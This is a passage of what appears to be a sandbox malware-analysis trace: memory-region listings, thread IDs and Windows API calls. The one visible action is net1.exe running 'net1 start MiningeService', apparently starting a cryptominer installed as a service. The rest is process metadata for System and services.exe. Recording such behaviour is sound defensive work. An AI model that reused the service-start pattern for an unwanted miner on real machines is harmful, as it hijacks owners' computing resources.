filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 6809 start_va = 0x72c70000 end_va = 0x72c87fff monitored = 0 entry_point = 0x72c71335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 6810 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6811 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6812 start_va = 0x70000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Thread: id = 251 os_tid = 0xd50 [0280.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe5c | out: lpSystemTimeAsFileTime=0x18fe5c*(dwLowDateTime=0xcd9f7200, dwHighDateTime=0x1d7fb6e)) [0280.859] GetCurrentProcessId () returned 0xd4c [0280.859] GetCurrentThreadId () returned 0xd50 [0280.859] GetTickCount () returned 0x1d62f2f [0280.859] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe54 | out: lpPerformanceCount=0x18fe54*=3100706422971) returned 1 [0280.859] GetModuleHandleA (lpModuleName=0x0) returned 0xa0000 [0280.859] __set_app_type (_Type=0x1) [0280.859] __p__fmode () returned 0x76d631f4 [0280.860] __p__commode () returned 0x76d631fc [0280.860] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaffe6) returned 0x0 [0280.860] __getmainargs (in: _Argc=0xb9064, _Argv=0xb906c, _Env=0xb9068, _DoWildCard=0, _StartInfo=0xb9024 | out: _Argc=0xb9064, _Argv=0xb906c, _Env=0xb9068) returned 0 [0280.860] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0280.860] GetConsoleOutputCP () returned 0x1b5 [0281.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb9080 | out: lpCPInfo=0xb9080) returned 1 [0281.052] SetThreadUILanguage (LangId=0x0) returned 0x409 [0281.055] sprintf_s (in: _DstBuf=0x18fe14, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0281.056] setlocale (category=0, locale=".437") returned="English_United States.437" [0281.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x20c [0281.058] GetStdHandle (nStdHandle=0xfffffff4) returned 0x20c [0281.058] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start MiningeService" [0281.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fbe0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0281.058] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x68) returned 0x303c38 [0281.058] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fde4 | out: Buffer=0x18fde4*=0x301c98) returned 0x0 [0281.058] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fde4 | out: Buffer=0x18fde4*=0x301cb0) returned 0x0 [0281.058] _fileno (_File=0x76d62900) returned 0 [0281.058] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0281.059] _wcsicmp (_String1="accounts", _String2="start") returned -18 [0281.059] _wcsicmp (_String1="computer", _String2="start") returned -16 [0281.059] _wcsicmp (_String1="config", _String2="start") returned -16 [0281.059] _wcsicmp (_String1="continue", _String2="start") returned -16 [0281.059] _wcsicmp (_String1="cont", _String2="start") returned -16 [0281.059] _wcsicmp (_String1="file", _String2="start") returned -13 [0281.059] _wcsicmp (_String1="files", _String2="start") returned -13 [0281.059] _wcsicmp (_String1="group", _String2="start") returned -12 [0281.059] _wcsicmp (_String1="groups", _String2="start") returned -12 [0281.059] _wcsicmp (_String1="help", _String2="start") returned -11 [0281.059] _wcsicmp (_String1="helpmsg", _String2="start") returned -11 [0281.059] _wcsicmp (_String1="localgroup", _String2="start") returned -7 [0281.059] _wcsicmp (_String1="pause", _String2="start") returned -3 [0281.059] _wcsicmp (_String1="session", _String2="start") returned -15 [0281.059] _wcsicmp (_String1="sessions", _String2="start") returned -15 [0281.059] _wcsicmp (_String1="sess", _String2="start") returned -15 [0281.059] _wcsicmp (_String1="share", _String2="start") returned -12 [0281.059] _wcsicmp (_String1="start", _String2="start") returned 0 [0281.059] _wcsicmp (_String1="accounts", _String2="MiningeService") returned -12 [0281.059] _wcsicmp (_String1="computer", _String2="MiningeService") returned -10 [0281.059] _wcsicmp (_String1="config", _String2="MiningeService") returned -10 [0281.059] _wcsicmp (_String1="continue", _String2="MiningeService") returned -10 [0281.059] _wcsicmp (_String1="cont", _String2="MiningeService") returned -10 [0281.059] _wcsicmp (_String1="file", _String2="MiningeService") returned -7 [0281.060] _wcsicmp (_String1="files", _String2="MiningeService") returned -7 [0281.060] _wcsicmp (_String1="group", _String2="MiningeService") returned -6 [0281.060] _wcsicmp (_String1="groups", _String2="MiningeService") returned -6 [0281.060] _wcsicmp (_String1="help", _String2="MiningeService") returned -5 [0281.060] _wcsicmp (_String1="helpmsg", _String2="MiningeService") returned -5 [0281.060] _wcsicmp (_String1="localgroup", _String2="MiningeService") returned -1 [0281.060] _wcsicmp (_String1="pause", _String2="MiningeService") returned 3 [0281.060] _wcsicmp (_String1="session", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="sessions", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="sess", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="share", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="start", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="stats", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="statistics", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="stop", _String2="MiningeService") returned 6 [0281.060] _wcsicmp (_String1="time", _String2="MiningeService") returned 7 [0281.060] _wcsicmp (_String1="user", _String2="MiningeService") returned 8 [0281.060] _wcsicmp (_String1="users", _String2="MiningeService") returned 8 [0281.060] _wcsicmp (_String1="msg", _String2="MiningeService") returned 10 [0281.060] _wcsicmp (_String1="messenger", _String2="MiningeService") returned -4 [0281.060] _wcsicmp (_String1="receiver", _String2="MiningeService") returned 5 [0281.060] _wcsicmp (_String1="rcv", _String2="MiningeService") returned 5 [0281.060] _wcsicmp (_String1="netpopup", _String2="MiningeService") returned 1 [0281.060] _wcsicmp (_String1="redirector", _String2="MiningeService") returned 5 [0281.060] _wcsicmp (_String1="redir", _String2="MiningeService") returned 5 [0281.060] _wcsicmp (_String1="rdr", _String2="MiningeService") returned 5 [0281.060] _wcsicmp (_String1="workstation", _String2="MiningeService") returned 10 [0281.060] _wcsicmp (_String1="work", _String2="MiningeService") returned 10 [0281.060] _wcsicmp (_String1="wksta", _String2="MiningeService") returned 10 [0281.060] _wcsicmp (_String1="prdr", _String2="MiningeService") returned 3 [0281.061] _wcsicmp (_String1="devrdr", _String2="MiningeService") returned -9 [0281.061] _wcsicmp (_String1="lanmanworkstation", _String2="MiningeService") returned -1 [0281.061] _wcsicmp (_String1="server", _String2="MiningeService") returned 6 [0281.061] _wcsicmp (_String1="svr", _String2="MiningeService") returned 6 [0281.061] _wcsicmp (_String1="srv", _String2="MiningeService") returned 6 [0281.061] _wcsicmp (_String1="lanmanserver", _String2="MiningeService") returned -1 [0281.061] _wcsicmp (_String1="alerter", _String2="MiningeService") returned -12 [0281.061] _wcsicmp (_String1="netlogon", _String2="MiningeService") returned 1 [0281.061] _wcsupr (in: _String="MiningeService" | out: _String="MININGESERVICE") returned="MININGESERVICE" [0281.061] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x305540 [0281.069] GetServiceKeyNameW (in: hSCManager=0x305540, lpDisplayName="MININGESERVICE", lpServiceName=0xbaaf0, lpcchBuffer=0x18fd7c | out: lpServiceName="MiningeService", lpcchBuffer=0x18fd7c) returned 1 [0281.070] _wcsicmp (_String1="msg", _String2="MiningeService") returned 10 [0281.070] _wcsicmp (_String1="messenger", _String2="MiningeService") returned -4 [0281.070] _wcsicmp (_String1="receiver", _String2="MiningeService") returned 5 [0281.070] _wcsicmp (_String1="rcv", _String2="MiningeService") returned 5 [0281.070] _wcsicmp (_String1="redirector", _String2="MiningeService") returned 5 [0281.070] _wcsicmp (_String1="redir", _String2="MiningeService") returned 5 [0281.070] _wcsicmp (_String1="rdr", _String2="MiningeService") returned 5 [0281.070] _wcsicmp (_String1="workstation", _String2="MiningeService") returned 10 [0281.070] _wcsicmp (_String1="work", _String2="MiningeService") returned 10 [0281.070] _wcsicmp (_String1="wksta", _String2="MiningeService") returned 10 [0281.070] _wcsicmp (_String1="prdr", _String2="MiningeService") returned 3 [0281.070] _wcsicmp (_String1="devrdr", _String2="MiningeService") returned -9 [0281.071] _wcsicmp (_String1="lanmanworkstation", _String2="MiningeService") returned -1 [0281.071] _wcsicmp (_String1="server", _String2="MiningeService") returned 6 [0281.071] _wcsicmp (_String1="svr", _String2="MiningeService") returned 6 [0281.071] _wcsicmp (_String1="srv", _String2="MiningeService") returned 6 [0281.071] _wcsicmp (_String1="lanmanserver", _String2="MiningeService") returned -1 [0281.071] _wcsicmp (_String1="alerter", _String2="MiningeService") returned -12 [0281.071] _wcsicmp (_String1="netlogon", _String2="MiningeService") returned 1 [0281.071] NetServiceControl (in: servername=0x0, service="MiningeService", opcode=0x0, arg=0x0, bufptr=0x18fd70 | out: bufptr=0x18fd70) returned 0x0 [0281.073] NetServiceInstall (servername=0x0, service="MiningeService", argc=0x0, argv=0x0, bufptr=0x18fd60) Process: id = "37" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "36" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 252 os_tid = 0x88c Thread: id = 253 os_tid = 0xfe8 Thread: id = 254 os_tid = 0xa4 Thread: id = 255 os_tid = 0xdf8 Thread: id = 256 os_tid = 0x824 Thread: id = 257 os_tid = 0x818 Thread: id = 258 os_tid = 0x774 Thread: id = 259 os_tid = 0x10 Thread: id = 260 os_tid = 0x350 Thread: id = 261 os_tid = 0x1c Thread: id = 262 os_tid = 0x304 Thread: id = 263 os_tid = 0xd4 Thread: id = 264 os_tid = 0xd8 Thread: id = 265 os_tid = 0x7c Thread: id = 266 os_tid = 0x14 Thread: id = 267 os_tid = 0x50 Thread: id = 268 os_tid = 0x40 Thread: id = 269 os_tid = 0x698 Thread: id = 270 os_tid = 0xc0 Thread: id = 271 os_tid = 0x64c Thread: id = 272 os_tid = 0x60 Thread: id = 273 os_tid = 0x4bc Thread: id = 274 os_tid = 0x318 Thread: id = 275 os_tid = 0x0 Thread: id = 276 os_tid = 0x4dc Thread: id = 277 os_tid = 0x5e8 Thread: id = 278 os_tid = 0x5e4 Thread: id = 279 os_tid = 0x4e0 Thread: id = 280 os_tid = 0x7c0 Thread: id = 281 os_tid = 0x18 Thread: id = 282 os_tid = 0xfc Thread: id = 283 os_tid = 0x20 Thread: id = 284 os_tid = 0x6f8 Thread: id = 285 os_tid = 0x6f4 Thread: id = 286 os_tid = 0x6ec Thread: id = 287 os_tid = 0x6d4 Thread: id = 288 os_tid = 0x6c8 Thread: id = 289 os_tid = 0x6b4 Thread: id = 290 os_tid = 0x67c Thread: id = 291 os_tid = 0x24 Thread: id = 292 os_tid = 0x5d8 Thread: id = 293 os_tid = 0x5e0 Thread: id = 294 os_tid = 0x580 Thread: id = 295 os_tid = 0x190 Thread: id = 296 os_tid = 0x84 Thread: id = 297 os_tid = 0x4d8 Thread: id = 298 os_tid = 0x98 Thread: id = 299 os_tid = 0xbc Thread: id = 300 os_tid = 0x80 Thread: id = 301 os_tid = 0x3c8 Thread: id = 302 os_tid = 0xa0 Thread: id = 303 os_tid = 0x88 Thread: id = 304 os_tid = 0x90 Thread: id = 305 os_tid = 0x300 Thread: id = 306 os_tid = 0x8c Thread: id = 307 os_tid = 0x284 Thread: id = 308 os_tid = 0x74 Thread: id = 309 os_tid = 0x9c Thread: id = 310 os_tid = 0x68 Thread: id = 311 os_tid = 0x104 Thread: id = 312 os_tid = 0x4c Thread: id = 313 os_tid = 0xb4 Thread: id = 314 os_tid = 0x5c Thread: id = 315 os_tid = 0x154 Thread: id = 316 os_tid = 0x12c Thread: id = 317 os_tid = 0x134 Thread: id = 318 os_tid = 0xc8 Thread: id = 319 os_tid = 0x34 Thread: id = 320 os_tid = 0x94 Thread: id = 321 os_tid = 0x130 Thread: id = 322 os_tid = 0x128 Thread: id = 323 os_tid = 0x124 Thread: id = 324 os_tid = 0x11c Thread: id = 325 os_tid = 0x3c Thread: id = 326 os_tid = 0x2c Thread: id = 327 os_tid = 0x28 Thread: id = 328 os_tid = 0x44 Thread: id = 329 os_tid = 0x30 Thread: id = 330 os_tid = 0x48 Thread: id = 331 os_tid = 0x38 Thread: id = 332 os_tid = 0xc4 Thread: id = 333 os_tid = 0x8 Process: id = "38" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x2c03d000" os_pid = "0x1c8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "36" os_parent_pid = "0x170" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 6829 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6830 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6831 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6832 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6833 start_va = 0x50000 end_va = 0x54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "services.exe.mui" filename = "\\Windows\\System32\\en-US\\services.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\services.exe.mui") Region: id = 6834 start_va = 0x60000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6835 start_va = 0x160000 end_va = 0x1c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6836 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6837 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6838 start_va = 0x1f0000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6839 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6840 start_va = 0x370000 end_va = 0x4f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 6841 start_va = 0x500000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 6842 start_va = 0x690000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 6843 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 6844 start_va = 0x770000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 6845 start_va = 0x7d0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 6846 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 6847 start_va = 0x9e0000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 6848 start_va = 0xb50000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 6849 start_va = 0xc50000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 6850 start_va = 0xcd0000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 6851 start_va = 0xdb0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 6852 start_va = 0xf70000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 6853 start_va = 0xff0000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 6854 start_va = 0x1580000 end_va = 0x167ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 6855 start_va = 0x1730000 end_va = 0x19fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6856 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 6857 start_va = 0x1b00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 6858 start_va = 0x1d00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 6859 start_va = 0x1f00000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 6860 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6861 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6862 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6863 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6864 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6865 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6866 start_va = 0xff030000 end_va = 0xff082fff monitored = 0 entry_point = 0xff043310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 6867 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6868 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 6869 start_va = 0x7fefcc00000 end_va = 0x7fefcc38fff monitored = 0 entry_point = 0x7fefcc0c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 6870 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 6871 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 6872 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 6873 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 6874 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6875 start_va = 0x7fefd570000 end_va = 0x7fefd5d6fff monitored = 0 entry_point = 0x7fefd571010 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 6876 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 6877 start_va = 0x7fefd5f0000 end_va = 0x7fefd608fff monitored = 0 entry_point = 0x7fefd5f1020 region_type = mapped_file name = "scext.dll" filename = "\\Windows\\System32\\scext.dll" (normalized: "c:\\windows\\system32\\scext.dll") Region: id = 6878 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6879 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6880 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6881 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 6882 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6883 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6884 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6885 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6886 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6887 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6888 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6889 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6890 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6891 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6892 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6893 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6894 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6895 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6896 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 6897 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 6898 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 6899 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6900 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 6901 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 6902 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 6903 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 6904 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6905 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 334 os_tid = 0xf5c Thread: id = 335 os_tid = 0xd0c Thread: id = 336 os_tid = 0x224 Thread: id = 337 os_tid = 0x1d4 Thread: id = 338 